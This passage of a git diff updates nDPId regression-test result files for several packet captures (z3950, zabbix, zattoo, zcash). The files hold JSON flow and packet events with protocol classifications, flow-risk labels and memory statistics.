+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":16,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1623680697296,"flow_last_seen":1623680698846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4151,"flow_avg_l4_payload_len":276,"midstream":0,"ts_msec":1625070123680,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"193.174.240.93","src_port":58921,"dst_port":210,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Z39.50","breed":"Acceptable","category":"Network"}}
 00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":16,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1623680697296,"flow_last_seen":1623680698846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":4151,"flow_avg_l4_payload_len":276,"midstream":0,"ts_msec":1625070123680,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"193.174.240.93","src_port":58921,"dst_port":210,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625070123680,"flow_last_seen":1625070123680,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1625070123680,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"129.187.139.43","src_port":46524,"dst_port":9991,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1625070123680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1625070123680,"pkt":"YDjgxTWgABjzZLGICABFAAA0k\/xAAJAGiSTAqAAUgbuLK7W8JweM39PGAAAAAIAC+vDNyQAAAgQFtAEBBAIBAwMH"}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1625070123709,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1625070123709,"pkt":"ABjzZLGIYDjgxTWgCABFAAA0AABAADUGeCGBu4srwKgAFCcHtbz4JgxZjN\/Tx4ASchDtagAAAgQFrAEBBAIBAwMH"}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1625070123709,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1625070123709,"pkt":"YDjgxTWgABjzZLGICABFAAAok\/1AAJAGiS\/AqAAUgbuLK7W8JweM39PH+CYMWlAQAfbNvQAA"}
-00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1625070123680,"flow_last_seen":1625070196998,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1625070196998,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"129.187.139.43","src_port":46524,"dst_port":9991,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"Z39.50","breed":"Acceptable","category":"Network"}}
-00707{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":31,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1625070123680,"flow_last_seen":1625070200217,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":411,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1625070200217,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"129.187.139.43","src_port":46524,"dst_port":9991,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"Z39.50","breed":"Acceptable","category":"Network"}}
+00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1625070123680,"flow_last_seen":1625070196998,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1625070196998,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"129.187.139.43","src_port":46524,"dst_port":9991,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"Z39.50","breed":"Acceptable","category":"Network"}}
+00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":31,"source":"z3950.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1625070123680,"flow_last_seen":1625070200217,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":411,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1625070200217,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"129.187.139.43","src_port":46524,"dst_port":9991,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"Z39.50","breed":"Acceptable","category":"Network"}}
 00156{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":31,"source":"z3950.pcapng","alias":"nDPId-test","total-events-serialized":14}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 31/31
@@ -20,10 +20,10 @@
 ~~ total active/idle flows...: 2/2
 ~~ total timeout flows.......: 1
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4607385 bytes
-~~ total memory freed........: 4607385 bytes
-~~ total allocations/frees...: 99591/99591
+~~ total memory allocated....: 4692010 bytes
+~~ total memory freed........: 4692010 bytes
+~~ total allocations/frees...: 101181/101181
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 161 chars
-~~ json string max len.......: 712 chars
-~~ json string avg len.......: 498 chars
+~~ json string max len.......: 821 chars
+~~ json string avg len.......: 548 chars
diff --git a/test/results/zabbix.pcap.out b/test/results/zabbix.pcap.out
index b761a7b89..a918f07a3 100644
--- a/test/results/zabbix.pcap.out
+++ b/test/results/zabbix.pcap.out
@@ -3,8 +3,8 @@
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1572254070608,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1572254070608,"pkt":"RoQclwmZOjUSPEK7CABFAAA85AdAAEAGTujAqENiwKhDGd9KJ0JwAdHUAAAAAKACchAH+wAAAgQFtAQCCAorwjXTAAAAAAEDAwc="}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1572254070608,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1572254070608,"pkt":"OjUSPEK7RoQclwmZCABFAAA8AABAAEAGMvDAqEMZwKhDYidC30pw8XhkcAHR1aAScSDKPwAAAgQFtAQCCAorfUX3K8I10wEDAwc="}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1572254070608,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1572254070608,"pkt":"RoQclwmZOjUSPEK7CABFAAA05AhAAEAGTu\/AqENiwKhDGd9KJ0JwAdHVcPF4ZYAQAOUH8wAAAQEICivCNdQrfUX3"}
-00607{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1572254070608,"flow_last_seen":1572254070608,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":5,"midstream":0,"ts_msec":1572254070608,"l3_proto":"ip4","src_ip":"192.168.67.98","dst_ip":"192.168.67.25","src_port":57162,"dst_port":10050,"l4_proto":"tcp","ndpi": {"proto":"Zabbix","breed":"Acceptable","category":"Network"}}
-00647{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":10,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1572254070608,"flow_last_seen":1572254070614,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":3,"midstream":0,"ts_msec":1572254070614,"l3_proto":"ip4","src_ip":"192.168.67.98","dst_ip":"192.168.67.25","src_port":57162,"dst_port":10050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Zabbix","breed":"Acceptable","category":"Network"}}
+00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1572254070608,"flow_last_seen":1572254070608,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":5,"midstream":0,"ts_msec":1572254070608,"l3_proto":"ip4","src_ip":"192.168.67.98","dst_ip":"192.168.67.25","src_port":57162,"dst_port":10050,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Zabbix","breed":"Acceptable","category":"Network"}}
+00673{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":10,"source":"zabbix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1572254070608,"flow_last_seen":1572254070614,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":3,"midstream":0,"ts_msec":1572254070614,"l3_proto":"ip4","src_ip":"192.168.67.98","dst_ip":"192.168.67.25","src_port":57162,"dst_port":10050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Zabbix","breed":"Acceptable","category":"Network"}}
 00154{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":10,"source":"zabbix.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 10/10
@@ -14,10 +14,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4595119 bytes
-~~ total memory freed........: 4595119 bytes
-~~ total allocations/frees...: 99563/99563
+~~ total memory allocated....: 4680072 bytes
+~~ total memory freed........: 4680072 bytes
+~~ total allocations/frees...: 101153/101153
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 159 chars
-~~ json string max len.......: 652 chars
-~~ json string avg len.......: 466 chars
+~~ json string max len.......: 678 chars
+~~ json string avg len.......: 477 chars
diff --git a/test/results/zattoo.pcap.out b/test/results/zattoo.pcap.out
new file mode 100644
index 000000000..31c11f116
--- /dev/null
+++ b/test/results/zattoo.pcap.out
@@ -0,0 +1,30 @@
+00438{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"zattoo.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
+00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614851148233,"flow_last_seen":1614851148233,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1614851148233,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2930,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
+00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614851148233,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1614851148233,"pkt":"5kBKB+riApXG95NLCABFAAAw4ZkAAIAGAAAKZQACCmYAAgtyAbsk8\/zrAAAAAHACgAEU8QAAAgQFtAMDAQA="}
+00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614851148234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1614851148234,"pkt":"ApXG95NL5kBKB+riCABFAAAw4ZMAAH8GRWYKZgACCmUAAgG7C3Ik9AFrJPP87HASgAGZ0wAAAgQFtAMDAQA="}
+00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614851148234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1614851148234,"pkt":"5kBKB+riApXG95NLCABFAAAo4ZoAAIAGAAAKZQACCmYAAgtyAbsk8\/zsJPQBbFAQgAEU6QAAAAAAAAAA"}
+00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614851148233,"flow_last_seen":1614851148234,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1614851148234,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2930,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zattoo","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zattoo.com","ja3":"64bb849b426bd19378dcd61a6396fef1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01357{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1614851148233,"flow_last_seen":1614851148235,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1072,"flow_tot_l4_payload_len":1185,"flow_avg_l4_payload_len":237,"midstream":0,"ts_msec":1614851148235,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2930,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zattoo","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zattoo.com","ja3":"64bb849b426bd19378dcd61a6396fef1","ja3s":"5ea8fd3044cb27a1d12e476d60e0668c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Jose, O=Spirent Communications Inc., OU=IT, CN=www.spirent.com","subjectDN":"C=US, ST=California, L=San Jose, O=zattoo.com, OU=Marketing, CN=zattoo.com","fingerprint":"A8:F3:C0:1B:32:F1:73:F3:11:90:A0:01:3E:1B:3E:D5:0C:00:EB:D2"}}
+00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614851148248,"flow_last_seen":1614851148248,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1614851148248,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
+00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614851148248,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1614851148248,"pkt":"5kBKB+riApXG95NLCABFAAAw4b4AAIAGAAAKZQACCmYAAgt4AFAk9NudAAAAAHACgAEU8QAAAgQFtAMDAQA="}
+00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614851148248,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1614851148248,"pkt":"ApXG95NL5kBKB+riCABFAAAw4bcAAH8GRUIKZgACCmUAAgBQC3gk9N+yJPTbnnASgAHePQAAAgQFtAMDAQA="}
+00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614851148248,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1614851148248,"pkt":"5kBKB+riApXG95NLCABFAAAo4b8AAIAGAAAKZQACCmYAAgt4AFAk9NueJPTfs1AQgAEU6QAAAAAAAAAA"}
+00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614851148248,"flow_last_seen":1614851148248,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":401,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":100,"midstream":0,"ts_msec":1614851148248,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2936,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Zattoo","breed":"Fun","category":"Video"},"http": {"hostname":"zattosecurehd2-f.akamaihd.net","url":"zattosecurehd2-f.akamaihd.net\/crossdomain.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.6; rv:6.0) Gecko\/20100101 Firefox\/6.0"}}
+00904{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":32,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1614851148233,"flow_last_seen":1614851148238,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1165,"flow_tot_l4_payload_len":3626,"flow_avg_l4_payload_len":329,"midstream":0,"ts_msec":1614851148254,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2930,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zattoo","breed":"Fun","category":"Video"}}
+00664{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":32,"source":"zattoo.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1614851148248,"flow_last_seen":1614851148254,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":961,"flow_tot_l4_payload_len":8045,"flow_avg_l4_payload_len":383,"midstream":0,"ts_msec":1614851148254,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":2936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Zattoo","breed":"Fun","category":"Video"}}
+00155{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":32,"source":"zattoo.pcap","alias":"nDPId-test","total-events-serialized":15}
+~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
+~~ packets captured/processed: 32/32
+~~ skipped flows.............: 0
+~~ total layer4 data length..: 11671 bytes
+~~ total detected protocols..: 2
+~~ total active/idle flows...: 2/2
+~~ total timeout flows.......: 0
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+~~ total memory allocated....: 4683941 bytes
+~~ total memory freed........: 4683941 bytes
+~~ total allocations/frees...: 101184/101184
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+~~ json string min len.......: 160 chars
+~~ json string max len.......: 1362 chars
+~~ json string avg len.......: 830 chars
diff --git a/test/results/zcash.pcap.out b/test/results/zcash.pcap.out
index 053b64292..e07531def 100644
--- a/test/results/zcash.pcap.out
+++ b/test/results/zcash.pcap.out
@@ -3,8 +3,8 @@
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1514196094240,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1514196094240,"pkt":"fmgbW\/gUcIXCQA64CABFAAA8ux1AAEAGRaDAqAJcsiDE2deWI1qAnf85AAAAAKACchAV6gAAAgQFtAQCCApPjruwAAAAAAEDAwc="}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1514196094322,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1514196094322,"pkt":"cIXCQA64fmgbW\/gUCABFAAA8AABAADMGDb6yIMTZwKgCXCNa15Yj5r0mgJ3\/OqAScSDZNwAAAgQFtAQCCArshW\/8T467sAEDAwk="}
 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1514196094322,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1514196094322,"pkt":"fmgbW\/gUcIXCQA64CABFAAA0ux5AAEAGRafAqAJcsiDE2deWI1qAnf86I+a9J4AQAOV4LAAAAQEICk+Ou8XshW\/8"}
-00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1514196094240,"flow_last_seen":1514196094322,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1514196094322,"l3_proto":"ip4","src_ip":"192.168.2.92","dst_ip":"178.32.196.217","src_port":55190,"dst_port":9050,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":145,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":145,"flow_first_seen":1514196094240,"flow_last_seen":1514197248783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":11022,"flow_avg_l4_payload_len":76,"midstream":0,"ts_msec":1514197248783,"l3_proto":"ip4","src_ip":"192.168.2.92","dst_ip":"178.32.196.217","src_port":55190,"dst_port":9050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port","22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1514196094240,"flow_last_seen":1514196094322,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1514196094322,"l3_proto":"ip4","src_ip":"192.168.2.92","dst_ip":"178.32.196.217","src_port":55190,"dst_port":9050,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
